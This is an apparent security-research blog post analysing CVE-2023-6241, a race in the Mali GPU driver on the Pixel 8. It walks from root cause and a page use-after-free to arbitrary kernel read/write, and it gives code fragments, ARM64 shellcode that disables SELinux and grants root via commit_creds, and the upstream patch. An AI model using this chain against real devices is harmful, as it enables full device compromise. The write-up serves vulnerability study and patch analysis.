As part of my internship at STAR Labs, I was tasked with conducting an N-day analysis of CVE-2023-6241. The original PoC can be found here, along with the accompanying write-up.
In this blog post, I will explain the root cause as well as an alternative exploitation technique used to exploit the page UAF, achieving arbitrary kernel code execution.
The following exploit was tested on a Pixel 8 running the latest version available prior to the patch.
```
shiba:/ $ getprop ro.build.fingerprint
google/shiba/shiba:14/UQ1A.240205.004/11269751:user/release-keys
```
# Root Cause Analysis
The bug occurs due to a race condition in the `kbase_jit_grow` function ( _source_).
The race window opens when the number of physical pages requested by the caller exceeds the number of pages in the `kctx`'s mempool. The lock is then dropped to allow the mempool to be refilled by the kernel.
After refilling, the previously cached `old_size` value is passed to `kbase_mem_grow_gpu_mapping` to map the new pages. The code incorrectly assumes that `old_size` and `nents` still hold the same value after the while loop below.
```
/* Grow the backing */
old_size = reg->gpu_alloc->nents;    // previous old_size

/* Allocate some more pages */
delta = info->commit_pages - reg->gpu_alloc->nents;
pages_required = delta;
...
while (kbase_mem_pool_size(pool) < pages_required) {
	int pool_delta = pages_required - kbase_mem_pool_size(pool);
	int ret;

	kbase_mem_pool_unlock(pool);
	spin_unlock(&kctx->mem_partials_lock);

	kbase_gpu_vm_unlock(kctx);                                // lock dropped
	ret = kbase_mem_pool_grow(pool, pool_delta, kctx->task);  // race window here
	kbase_gpu_vm_lock(kctx);                                  // lock reacquired

	if (ret)
		goto update_failed;

	spin_lock(&kctx->mem_partials_lock);
	kbase_mem_pool_lock(pool);
}
// after the race window, the actual nents may be greater than old_size
...
ret = kbase_mem_grow_gpu_mapping(kctx, reg, info->commit_pages, old_size, mmu_sync_info);
```
If we introduce a page fault (via a write instruction) to grow the JIT memory region during the race window, the actual number of backing pages (`reg->gpu_alloc->nents`) will be greater than the cached `old_size`.
> _During a page fault, the page fault handler will map and back physical pages up to the faulting address._
```
-----------------------------
|  old_size  |  FAULT_SIZE  |
-----------------------------
```
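To make the interleaving concrete, the race can be pictured as two concurrent actors: one submits the JIT grow request, and one touches the tail of the JIT region so that the GPU fault handler backs extra pages while `kbase_mem_pool_grow` is refilling the pool. The sketch below is only a simplified model of that orchestration, not the PoC's actual code: `submit_jit_grow()` and `gpu_write()` are hypothetical stand-ins for the PoC's KCPU-queue and GPU-write helpers, and the constants are illustrative.

```
#include <stdint.h>
#include <pthread.h>

#define FAULT_SIZE 0x300   /* extra pages faulted in during the race */

/* Hypothetical stand-ins for the PoC's plumbing (KCPU queue submission and
 * a GPU write command); names and signatures are illustrative. */
extern void submit_jit_grow(int mali_fd, uint64_t commit_pages);
extern void gpu_write(int mali_fd, uint64_t gpu_va, uint64_t value);

static int mali_fd;
static uint64_t jit_addr, old_size, commit_pages;

/* Racer: while kbase_jit_grow() has dropped the kctx lock inside
 * kbase_mem_pool_grow(), a GPU write past the currently mapped end makes the
 * fault handler back pages up to the faulting address, growing nents behind
 * kbase_jit_grow()'s back. */
static void *fault_thread(void *arg)
{
    (void)arg;
    uint64_t fault_va = jit_addr + (old_size + FAULT_SIZE - 1) * 0x1000;
    gpu_write(mali_fd, fault_va, 0x41);
    return NULL;
}

static void race_once(void)
{
    pthread_t t;
    pthread_create(&t, NULL, fault_thread, NULL);
    submit_jit_grow(mali_fd, commit_pages);   /* enters the race window */
    pthread_join(t, NULL);
}
```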
### Backing pages
`kbase_jit_grow` adds backing pages to the memory region with the line:
```
kbase_alloc_phy_pages_helper_locked(reg->gpu_alloc, pool, delta, &prealloc_sas[0])
```
The `delta` argument is the value cached before the race window, computed from the same `nents` snapshot as `old_size` (`info->commit_pages - old_size`). When we look at the `kbase_alloc_phy_pages_helper_locked` function, it references the new `reg->gpu_alloc->nents` value instead and uses it as the start offset for adding `delta` pages (source). In other words, physical backing pages are allocated from offset `nents` to `nents + delta`.
### Mapping pages
`kbase_jit_grow` then tries to map the pages with:
```
kbase_mem_grow_gpu_mapping(kctx, reg, info->commit_pages, old_size, mmu_sync_info)
```
When mapping the new pages, `kbase_mem_grow_gpu_mapping` calculates `delta` as `info->commit_pages - old_size` and starts mapping `delta` pages from `old_size`. Since `kbase_mem_grow_gpu_mapping` does not 'know' that the region's actual `nents` has increased, it will fail to map the last `FAULT_SIZE` pages.
```
Expectation:
---------------------------------
|  old_size  |      delta       |
---------------------------------

Reality:
-----------------------------------------------
|  old_size  |  FAULT_SIZE  |      delta      |
-----------------------------------------------
or
-----------------------------------------------
|  old_size  |      delta      |  FAULT_SIZE  |
-----------------------------------------------
```
We will now end up with a state where the right portion of the memory region is unmapped but backed by physical pages.
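To make the mismatch concrete, the two ranges can be worked out directly from the values above. The sketch below just prints which page offsets end up physically backed and which end up mapped; the constants are illustrative, not the PoC's actual sizes.

```
#include <stdio.h>
#include <stdint.h>

int main(void)
{
    uint64_t old_size     = 0x1000;  /* pages backing the region before the race */
    uint64_t fault_size   = 0x300;   /* pages backed by the racing GPU fault     */
    uint64_t commit_pages = 0x2000;  /* pages requested by the JIT grow          */

    uint64_t delta = commit_pages - old_size;   /* cached before the race window */
    uint64_t nents = old_size + fault_size;     /* actual backing after the race */

    /* kbase_alloc_phy_pages_helper_locked() backs pages [nents, nents + delta) */
    printf("backed : [0, 0x%llx)\n", (unsigned long long)(nents + delta));
    /* kbase_mem_grow_gpu_mapping() only maps pages [old_size, old_size + delta) */
    printf("mapped : [0, 0x%llx)\n", (unsigned long long)(old_size + delta));
    /* the tail is backed by physical pages but has no GPU mapping */
    printf("backed but unmapped tail: 0x%llx pages\n", (unsigned long long)fault_size);
    return 0;
}
```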
# Exploit
In order to make this exploitable, we need to first understand how the Mali driver handles shrinking and freeing of memory regions.
> _The original writeup explains it pretty well._
The idea is to create a memory region in which a portion remains unmapped while the surrounding areas are still mapped. This configuration causes the shrinking routine to skip unmapping that specific portion, even if its backing page is marked for release.
To achieve that, we can introduce a second fault near the end of the existing memory region to fulfil the criteria.
```
--------------------------------------------------------------
|  old_size  |  delta  |  FAULT_SIZE  |  second fault  |
--------------------------------------------------------------
```
We then shrink the memory region, which causes the GPU to start unmapping after `final_size`. The Mali driver will skip the mappings in `PTE1` since that range is unmapped and invalid. When it reaches `PTE2`, the first entry in `PTE2` is also invalid because the corresponding address is unmapped, so `kbase_mmu_teardown_pgd_pages` will skip unmapping the next 512 virtual pages. However, that should not have been the case, since there are still valid PTEs that need to be unmapped.
```
--------------------------------------------------------------
|   mapped   |      unmapped      |        mapped            |
--------------------------------------------------------------
             |-- PTE1 --|-- PTE2 --|
             * region skipped unmapping but backing pages are freed
```
We can set `FAULT_SIZE` to 0x300 pages, such that it occupies slightly more than one last-level page table (_which can hold 0x200 pages_). Hence, a portion of the memory in `second_fault` remains mapped after shrinking. However, all the physical pages after `final_size` are freed.
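A quick sanity check of why 0x300 pages is enough: each last-level page table covers 0x200 pages, so a 0x300-page fault always straddles at least two last-level tables, and the part that lands in the second table is what stays mapped after the shrink. A minimal sketch of that arithmetic (alignment to a table boundary is assumed for simplicity):

```
#include <stdio.h>
#include <stdint.h>

#define ENTRIES_PER_PT 0x200   /* 512 entries per last-level page table (4K granule) */

int main(void)
{
    uint64_t fault_size = 0x300;   /* pages covered by the second fault */

    uint64_t tables_spanned  = (fault_size + ENTRIES_PER_PT - 1) / ENTRIES_PER_PT;
    uint64_t pages_in_second = fault_size - ENTRIES_PER_PT;

    printf("last-level tables touched : %llu\n", (unsigned long long)tables_spanned);
    printf("pages left in second table: 0x%llx\n", (unsigned long long)pages_in_second);
    return 0;
}
```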
At this point, we are still able to access this invalid mapped region (`write_addr = corrupted_jit_addr + (THRESHOLD) * 0x1000`), whose physical page has been freed. We need to reclaim this freed page before it gets consumed by other objects. Our goal is to force two virtual memory regions to reference the same physical page:
1. Mass allocate and map memory regions from the GPU
2. Write a magic value through the still-mapped region whose backing page has been freed (`write_addr`).
3. Scan all the allocated regions in (1) for the magic value to find which physical page has been reused.
Now we know that `write_addr` and `reused_addr` both reference the same physical page:
```
create_reuse_regions(mali_fd, &(reused_regions[0]), REUSE_REG_SIZE);

value = TEST_VAL;
write_addr = corrupted_jit_addr + (THRESHOLD) * 0x1000;
LOG("writing to gpu_va %lx\n", write_addr);
write_to(mali_fd, &write_addr, &value, command_queue, &kernel);

uint64_t reused_addr = find_reused_page(&(reused_regions[0]), REUSE_REG_SIZE);
if (reused_addr == -1) {
    err(1, "Cannot find reused page\n");
}
```
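For reference, here is a sketch of what a helper like `find_reused_page` could look like, assuming each reuse region created in step (1) is also mmap'd into the process so its pages can be read from the CPU side; the `struct reuse_region` layout and `TEST_VAL` here are assumptions, not the PoC's actual definitions.

```
#include <stddef.h>
#include <stdint.h>

#define TEST_VAL 0xdeadbeefdeadbeefULL   /* magic value written through write_addr */

struct reuse_region {
    uint64_t gpu_va;   /* GPU address of the region     */
    void    *cpu_va;   /* CPU mapping of the same pages */
    size_t   pages;    /* number of pages in the region */
};

/* Scan every sprayed region for the magic value; the page containing it
 * shares its physical backing with the corrupted JIT mapping (write_addr). */
static uint64_t find_reused_page(struct reuse_region *regions, size_t count)
{
    for (size_t i = 0; i < count; i++) {
        volatile uint64_t *base = regions[i].cpu_va;
        for (size_t pg = 0; pg < regions[i].pages; pg++) {
            if (base[pg * 0x1000 / sizeof(uint64_t)] == TEST_VAL)
                return regions[i].gpu_va + pg * 0x1000;
        }
    }
    return (uint64_t)-1;   /* matches the `reused_addr == -1` check above */
}
```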
## Arbitrary R/W
At this point, we have a state where we hold two memory regions (`write_addr` and `reused_addr`) that reference the same physical page. Our next goal is to turn this overlapping page into a stronger arbitrary read and write primitive.
The original exploit reuses the freed page by spraying Mali GPU PGDs. Since we have read and write access to the freed page, we are able to control a PTE within the newly allocated PGD. This allows us to change the backing page of our reserved buffer to point to any memory region, and subsequently use it to modify kernel functions.
> _Details explained in the original writeup_
There were a few interesting things to note in how Mali handles memory allocations, according to the writeup:
1. Memory allocations of physical pages for Mali drivers are done in tiers.
   - It first draws from the context pool, followed by the device pool. If both pools are unable to fulfil the request, it then requests pages from the kernel buddy allocator.
2. The GPU’s PGD allocations are requested from `kbdev` mempool, which is the device’s mempool.
Hence, the original exploit presented a technique to reliably place the freed page into the `kbdev` pool so that it is reused for PGD allocation:
1. Allocate some pages from the GPU (used for spraying PGDs)
2. Allocate `MAX_POOL_SIZE` pages
3. Free `MAX_POOL_SIZE` pages
4. Free our UAF page ( `reused_addr`) into `kbdev` mempool
5. Map and write to the allocated pages in (1), which will cause the allocation of new PGDs in the GPU. Hopefully, it reuses the page referenced by `reused_addr`
6. Scan the memory region from `write_addr` to find PTEs.
The exploit is now able to control the physical backing pages of the regions reserved in (1) just by modifying the PTEs, subsequently achieving arbitrary r/w.
> _Check the device's `MAX_POOL_SIZE` with `shiba:/ $ cat /sys/module/mali_kbase/drivers/platform:mali/1f000000.mali/mem_pool_max_size`, which returns `16384 16384 16384 16384` on this device._
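Concretely, "modifying the PTEs" means writing new 64-bit descriptors through `write_addr`. A rough sketch of how an entry could be retargeted at a chosen physical address is shown below; the attribute bits are illustrative assumptions, and in practice it is safer to recycle the low bits of an existing valid entry read out of the sprayed table.

```
#include <stdint.h>

/* Illustrative attribute bits for a valid, writable entry; the real values
 * depend on the page-table format in use and should be copied from a
 * known-good entry. */
#define PTE_ATTRS_GUESS 0x443ULL

/* Build a last-level descriptor pointing at an arbitrary physical page. */
static uint64_t make_pte(uint64_t phys_addr)
{
    return (phys_addr & ~0xfffULL) | PTE_ATTRS_GUESS;
}

/* Keep the existing low attribute bits and only swap the output address. */
static uint64_t retarget_pte(uint64_t existing_pte, uint64_t new_phys)
{
    return (existing_pte & 0xfffULL) | (new_phys & ~0xfffULL);
}
```

Retargeting an entry at, for example, kernel text and then writing through the corresponding reserved region is what turns the overlap into a full arbitrary read/write.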
## Other Pathways
My mentor Peter suggested that I utilise the Page UAF primitive to explore other kernel exploitation techniques.
To achieve that, we first need to get the freed page out of the GPU's control. We can modify the original exploit to drain `2 * MAX_POOL_SIZE` pages instead, which fills up both the context and device mempools. This causes the subsequently freed page to be returned directly to the kernel buddy allocator instead of being retained within the Mali driver.
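A sketch of that modification is shown below; `gpu_alloc_pages()` and `gpu_free_pages()` are hypothetical stand-ins for the PoC's allocation helpers built on the kbase alloc/free ioctls, and the ordering is the part that matters.

```
#include <stdint.h>

#define MAX_POOL_SIZE 16384   /* mem_pool_max_size on this device */

/* Hypothetical helpers wrapping the kbase MEM_ALLOC / MEM_FREE ioctls;
 * names and signatures are illustrative. */
extern uint64_t gpu_alloc_pages(int mali_fd, uint64_t pages);
extern void     gpu_free_pages(int mali_fd, uint64_t gpu_va);

/* Fill both the context pool and the device pool so that the next freed page
 * (our UAF page) overflows straight back to the kernel buddy allocator
 * instead of being cached by the driver. */
static void overflow_mem_pools(int mali_fd)
{
    uint64_t filler = gpu_alloc_pages(mali_fd, 2 * MAX_POOL_SIZE);
    gpu_free_pages(mali_fd, filler);   /* these pages now occupy both pools */
}
```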
We are now able to use the usual Linux kernel exploitation techniques to spray kernel objects. I originally tried spraying `pipe_buffer` objects, since they are commonly used in other exploits and are user controllable. However, I was unable to get the objects to reuse the UAF page reliably. I then came across the Dirty Pagetable technique used by ptr-yudai, which worked well for me. This technique is very similar to the one used in the original exploit, except that it operates outside of the GPU.
We first `mmap` a large memory region in the virtual address space. These virtual memory regions will not be backed by any physical pages until memory accesses are performed on them.
```
void* page_spray[N_PAGESPRAY];
for (int i = 0; i < N_PAGESPRAY; i++) {
    page_spray[i] = mmap(...);   // anonymous mapping, not yet backed by physical pages
}
...
// Copy the second PTE over the first -> 2 regions in page_spray will now have the same backing page
uint64_t first_pte_val = read_from(mali_fd, &write_addr, command_queue, &kernel);
if (first_pte_val == TEST_VAL) {
    err(1, "[!] pte spray failed\n");
}
uintptr_t second_pte_addr = write_addr + 8;
uint64_t second_pte_val = read_from(mali_fd, &second_pte_addr, command_queue, &kernel);
write_to(mali_fd, &write_addr, &second_pte_val, command_queue, &kernel);
usleep(10000);

// Iterate through all the regions using the id, to find which region is corrupted
void* corrupted_mapping_addr = 0;
for (int i = 0; i < N_PAGESPRAY; i++) {
    ...
}
```

### SELinux bypass

> _This is a pretty good article which explains common ways to bypass SELinux on Android_
The simplest way to bypass SELinux on this device is to overwrite the `state->enforcing` value with `false`. To achieve this, we can overwrite the `avc_denied` function in kernel text to always grant permission requests, even those that were originally supposed to be denied.
The first argument of `avc_denied` is the `selinux_state`:
```
static noinline int avc_denied(struct selinux_state *state, u32 ssid, u32 tsid,
			       u16 tclass, u32 requested, u8 driver, u8 xperm,
			       unsigned int flags, struct av_decision *avd)
```
Hence, we can use it to overwrite the `enforcing` field with the following shellcode:
```
strb wzr, [x0]   // set selinux_state->enforcing to false
mov  x0, #0      // grant the request
ret
```
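For reference, those three instructions assemble to the following A64 opcodes; this is the kind of patch the arbitrary write would place at the start of `avc_denied` (the array name is just illustrative):

```
#include <stdint.h>

/* strb wzr, [x0]  -> selinux_state->enforcing = false
 * mov  x0, #0     -> return 0, i.e. grant the request
 * ret
 */
static const uint32_t avc_denied_patch[] = {
    0x3900001f,   /* strb wzr, [x0] */
    0xd2800000,   /* mov  x0, #0    */
    0xd65f03c0,   /* ret            */
};
```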
### Root
Like many other Linux kernel exploits, we can achieve `root` by calling `commit_creds(&init_cred)`. Since `sel_read_enforce` is invoked when we read from `/sys/fs/selinux/enforce`, we overwrite the function with the following shellcode:
```
adrp x0, init_cred
add  x0, x0, :lo12:init_cred
adrp x8, commit_creds
add  x8, x8, :lo12:commit_creds
stp  x29, x30, [sp, #-0x10]!
blr  x8
ldp  x29, x30, [sp], #0x10
ret
```
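Once `sel_read_enforce` has been patched, triggering it is just a normal read of `/sys/fs/selinux/enforce` from the exploit process. A minimal sketch of that last step (error handling omitted, Android shell path assumed):

```
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/* Reading the enforce node invokes the overwritten sel_read_enforce(),
 * which now calls commit_creds(&init_cred) for the calling task. */
static void become_root(void)
{
    char buf[8];
    int fd = open("/sys/fs/selinux/enforce", O_RDONLY);
    read(fd, buf, sizeof(buf));
    close(fd);

    if (getuid() == 0) {
        printf("[+] got root\n");
        execl("/system/bin/sh", "sh", (char *)NULL);
    }
}
```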
We can combine everything we’ve got so far to exploit the Pixel 8 successfully from the unprivileged `untrusted_app_27` context. Unfortunately, the exploit takes quite a while to complete (around 10 minutes from my testing).
## ‘Fix’ delay
To understand why the exploit has a 10-minute delay, we can check kmsg for logs. There were a lot of warnings thrown with the same stack dump.
```
[ 1881.358317][ T8672] ------------[ cut here ]------------
[ 1881.363557][ T8672] WARNING: CPU: 8 PID: 8672 at ../private/google-modules/gpu/mali_kbase/mmu/mali_kbase_mmu.c:2429 mmu_insert_pages_no_flush+0x2f8/0x76c [mali_kbase]
[ 1881.787213][ T8672] CPU: 8 PID: 8672 Comm: poc Tainted: G S W OE 5.15.110-android14-11-gcc48824eebe8-dirty #1
[ 1881.797995][ T8672] Hardware name: ZUMA SHIBA MP based on ZUMA (DT)
[ 1881.804254][ T8672] pstate: 22400005 (nzCv daif +PAN -UAO +TCO -DIT -SSBS BTYPE=--)
[ 1881.811905][ T8672] pc : mmu_insert_pages_no_flush+0x2f8/0x76c [mali_kbase]
[ 1881.818856][ T8672] lr : mmu_insert_pages_no_flush+0x2e4/0x76c [mali_kbase]
[ 1881.825813][ T8672] sp : ffffffc022e53880
[ 1881.829810][ T8672] x29: ffffffc022e53940 x28: ffffffd6e2e55378 x27: ffffffc01f26d0a8
[ 1881.837639][ T8672] x26: 000000000000caec x25: 00000000000000cb x24: 0000000000000001
[ 1881.845462][ T8672] x23: ffffff892fd0b000 x22: 00000000000001ff x21: 00000000000000ca
[ 1881.853287][ T8672] x20: ffffff8019cf0000 x19: 000000089ad27000 x18: ffffffd6e603c4d8
[ 1881.861111][ T8672] x17: ffffffd6e53d9690 x16: 000000000000000a x15: 0000000000000401
[ 1881.868936][ T8672] x14: 0000000000000401 x13: 0000000000007ff3 x12: 0000000000000f02
[ 1881.876760][ T8672] x11: 000000000000ffff x10: 0000000000000f02 x9 : 000ffffffd6e2e55
[ 1881.884584][ T8672] x8 : 004000089ad26743 x7 : ffffffc022e539a0 x6 : 0000000000000000
[ 1881.892410][ T8672] x5 : 000000000000caec x4 : 0000000000001ff5 x3 : 004000089ad27743
[ 1881.900234][ T8672] x2 : 0000000000000003 x1 : 0000000000000000 x0 : 004000089ad27743
[ 1881.908060][ T8672] Call trace:
[ 1881.911188][ T8672]  mmu_insert_pages_no_flush+0x2f8/0x76c [mali_kbase]
[ 1881.917796][ T8672]  kbase_mmu_insert_pages+0x48/0x9c [mali_kbase]
[ 1881.923968][ T8672]  kbase_mem_grow_gpu_mapping+0x58/0x68 [mali_kbase]
[ 1881.930486][ T8672]  kbase_jit_allocate+0x4e0/0x804 [mali_kbase]
[ 1881.936488][ T8672]  kcpu_queue_process+0xcb4/0x1644 [mali_kbase]
[ 1881.942574][ T8672]  kbase_csf_kcpu_queue_enqueue+0x1678/0x1d9c [mali_kbase]
[ 1881.949615][ T8672]  kbase_kfile_ioctl+0x3750/0x6e40 [mali_kbase]
[ 1881.955701][ T8672]  kbase_ioctl+0x6c/0x104 [mali_kbase]
[ 1881.961004][ T8672]  __arm64_sys_ioctl+0xa4/0x114
[ 1881.965695][ T8672]  invoke_syscall+0x5c/0x140
[ 1881.970134][ T8672]  el0_svc_common.llvm.10074779959175133548+0xb4/0xf0
[ 1881.976741][ T8672]  do_el0_svc+0x24/0x84
[ 1881.980740][ T8672]  el0_svc+0x2c/0xa4
[ 1881.984477][ T8672]  el0t_64_sync_handler+0x68/0xb4
[ 1881.989347][ T8672]  el0t_64_sync+0x1b0/0x1b4
[ 1881.993693][ T8672] ---[ end trace 52f32383958e509a ]---
```
It seems that the warning is triggered at `../private/google-modules/gpu/mali_kbase/mmu/mali_kbase_mmu.c:2429` in the `mmu_insert_pages_no_flush` function. In the source code, we see that `WARN_ON` is called within the loop, which matches what we see in kmsg.
```
for (i = 0; i < count; i++) {
	...
	WARN_ON(...);   /* warns if the current page is already a valid entry */
	...
}
```

Since the warning fires for every page that is already mapped, the time spent in the warning path scales with `FAULT_SIZE`, so one way to shorten the delay would be to reduce `FAULT_SIZE`.

```
-----------------------------
|  old_size  |  FAULT_SIZE  |
-----------------------------
```
However, we cannot reduce `FAULT_SIZE` much, as the number of pages has to be more than the number of entries in a last-level page table, as mentioned above. Unfortunately, I was not able to find other ways to skip the check solely through the exploit.
Nonetheless, I was able to write a loadable kernel module that skips the warning to speed up my testing. We can use a kprobe to skip the branch to `0x84C2C`, which removes the delay entirely.
```
// LKM to skip mmu_insert_pages_no_flush warning
#define pr_fmt(fmt) "%s: " fmt, __func__

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/kprobes.h>

#define MAX_SYMBOL_LEN 64
static char symbol[MAX_SYMBOL_LEN] = "mmu_insert_pages_no_flush";
module_param_string(symbol, symbol, sizeof(symbol), 0644);

static struct kprobe kp = {
	.symbol_name = symbol,
	.offset = 0x27c,
};

/* Skip the probed instruction (the branch into the WARN slow path) */
static int __kprobes handler_pre(struct kprobe *p, struct pt_regs *regs)
{
	instruction_pointer_set(regs, instruction_pointer(regs) + 4);
	return 1;
}

static int __init kprobe_init(void)
{
	int ret;

	kp.pre_handler = handler_pre;
	ret = register_kprobe(&kp);
	if (ret < 0) {
		pr_err("register_kprobe failed, returned %d\n", ret);
		return ret;
	}
	return 0;
}

static void __exit kprobe_exit(void)
{
	unregister_kprobe(&kp);
}

module_init(kprobe_init)
module_exit(kprobe_exit)
MODULE_LICENSE("GPL");
```

# Patch

The patch reworks `kbase_jit_grow` as follows:

```
@@ ... @@
 	if (reg->gpu_alloc->nents >= info->commit_pages)
 		goto done;

-	/* Grow the backing */
-	old_size = reg->gpu_alloc->nents;
-
 	/* Allocate some more pages */
 	delta = info->commit_pages - reg->gpu_alloc->nents;
 	pages_required = delta;
@@ -4111,6 +4108,17 @@
 		kbase_mem_pool_lock(pool);
 	}

+	if (reg->gpu_alloc->nents >= info->commit_pages) {
+		kbase_mem_pool_unlock(pool);
+		spin_unlock(&kctx->mem_partials_lock);
+		dev_info(
+			kctx->kbdev->dev,
+			"JIT alloc grown beyond the required number of initially required pages, this grow no longer needed.");
+		goto done;
+	}
+
+	old_size = reg->gpu_alloc->nents;
+	delta = info->commit_pages - old_size;
 	gpu_pages = kbase_alloc_phy_pages_helper_locked(reg->gpu_alloc, pool, delta,
 							&prealloc_sas[0]);
 	if (!gpu_pages) {
```
It first checks whether the actual number of backing pages already satisfies the request's `commit_pages` after the race window. If the grow is no longer needed, the function returns early, skipping the call that maps the `delta` pages.
It also recalculates the `old_size` after the race window instead of using the cached value.
# References
– https://github.blog/security/vulnerability-research/gaining-kernel-code-execution-on-an-mte-enabled-pixel-8/
– https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606